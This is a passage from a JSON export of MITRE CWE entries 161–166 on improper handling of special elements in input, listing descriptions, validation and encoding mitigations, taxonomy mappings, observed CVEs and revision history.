Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Leading Special Elements"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Multiple Leading Special Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Multiple Leading Special Elements","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Multiple Leading Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"162":{"attr":{"@_ID":"162","@_Name":"Improper Neutralization of Trailing Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled trailing special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that trailing special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Trailing Special Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"635"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Trailing Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Trailing Special Element","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Trailing Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"163":{"attr":{"@_ID":"163","@_Name":"Improper Neutralization of Multiple Trailing Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled multiple trailing special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that multiple trailing special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Trailing Special Elements"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Multiple Trailing Special Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Multiple Trailing Special Elements","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Multiple Trailing Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"164":{"attr":{"@_ID":"164","@_Name":"Improper Neutralization of Internal Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled internal special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that internal special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Internal Special Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Internal Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Internal Special Element","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Internal Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"165":{"attr":{"@_ID":"165","@_Name":"Improper Neutralization of Multiple Internal Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled multiple internal special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"164","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that multiple internal special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Internal Special Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Multiple Internal Special Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Multiple Internal Special Elements","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Multiple Internal Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"166":{"attr":{"@_ID":"166","@_Name":"Improper Handling of Missing Special Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not handle or incorrectly handles when an expected special element is missing.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"159","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that special elements will be removed in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1362","Description":"Crash via message type without separator character","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1362"},{"Reference":"CVE-2002-0729","Description":"Missing special character (separator) causes crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0729"},{"Reference":"CVE-2002-1532","Description":"HTTP GET without \\\\r\\\\n\\\\r\\\\n CRLF sequences causes product to wait indefinitely and prevents other users from accessing it","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1532"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Special Element"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 